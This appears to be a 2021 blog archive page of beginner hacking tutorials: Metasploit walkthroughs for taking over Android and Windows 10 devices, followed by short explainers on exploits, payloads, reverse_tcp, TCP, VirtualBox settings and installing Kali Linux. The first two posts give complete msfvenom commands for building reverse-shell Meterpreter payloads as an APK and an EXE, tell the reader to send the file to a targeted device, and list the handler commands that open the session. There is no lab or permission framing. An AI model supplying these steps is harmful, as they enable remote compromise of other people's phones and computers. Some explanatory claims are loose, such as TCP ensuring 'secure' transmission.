Posts

Showing posts from September, 2021

Exploitng Android using Metasploit

Image
      Step 1:- Open Terminal or Root Terminal in Kali-Linux Write the payload for android  which is given below      msfvenom -p android/meterpreter/reverse_tcp lhost=<Enter your IP address> lport=4444  > android.apk You can use any lport like 4444,8080     Step 2:- Send the apk file to the targeted device Then after installing it and it will ask for permission that shown bellow Then aftertouch on install Anyway      It will look like that shown in the image [MainActivity]       Step 3:- Write commands shown bellow msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost <Your IP address>  set lport  <which you write in payload> run/exploit Then after click on mainactivity on android [It's msfconsole] [It's all commands]                               ...

Exploiting Windows 10 using payload and reverse_tcp(Metasploit)

Image
         Step 1:- To get your IP address type the following command: ifconfig             Step 2:- Open terminal or Root terminal and type the following command :        msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<Enter your IP> -f exe > hack.exe you can use any lport like lport=4444,lport=8000          Step 3:- Find the file to the main desktop using drag and drop            Step 4:- In the terminal type the following command :   msfconsole   use exploit/multi/handler   set payload windows/x64/meterpreter/reverse_tcp   set lhost 192.168.43.110   set lport 8080   exploit          Step 5:-  Run the file which we put on the main desktop then after you will see the new meterpreter session   open         Step 5:- Type help...

What is exploit and payload

Image
       Exploit:- An exploit is a piece of code written to take advantage of a particular vulnerability           step 1         :-  open kali terminal  root terminal          step 2        :- write msfconsole                   step 3         :- write use exploit         step 4                    :- Example :-  exploit/windows/scada/igss9_igssdataserver_listall       Payload:- A payload is a piece of code to be executed through said exploit        step 1          :- open kali terminal or root terminal        step 2          :-write msfconsole         s...

What is reverse_tcp

Reverse_tcp is basically  instead of the attacker initiating the connection which will obviously be blocked by the firewall Instade,the device initiates the connection to the attacker, which will be allowed by the firewall and the attacker then take control of the device and pass commands. It's  a type of reverse shell

What is TCP

The full form of TCP is Transmission Control Protocol  It stands for communications standard that enables application Programs  It also computing devices to exchange messages over a network  It is designed to send  packets across the internet  and ensure the successful delivery of data and messages over the network  It's  a basically Three-way handshake                What is TCP used for? TCP is used for organizing data in a way that ensures the secure transmission between the server and client                Example of TCP World Wide Web ( HTTP)   E-mail (SMTP TCP) File Transfer Protocol (FTP)           That's it from my side. Thank you 😊. Comments are appreciated

Settings on VirtualBox

Image
open VirtualBox         open setting and go to general and click on advance       And set both settings on  Bidirectional  Go to network and change attached to setting on Bridged Adapte        

How to install Kali Linux in windows

Image
 Install  oracle VirtualBox                                                                                                                                                     Dounload VirtualBox Install oracle VirtualBox Extention Pack                                                                                             Dounload VirtualBox Ex...

Why we use Linux for Hacking base software

 Linux Linux is open source & is free to use Linus file system is case sensitive Linux user use monolithic Kernal Type Linux is highly  secure as as compare to windows Linux is more efficient  in  options Linux uses forward slash as path separator between directories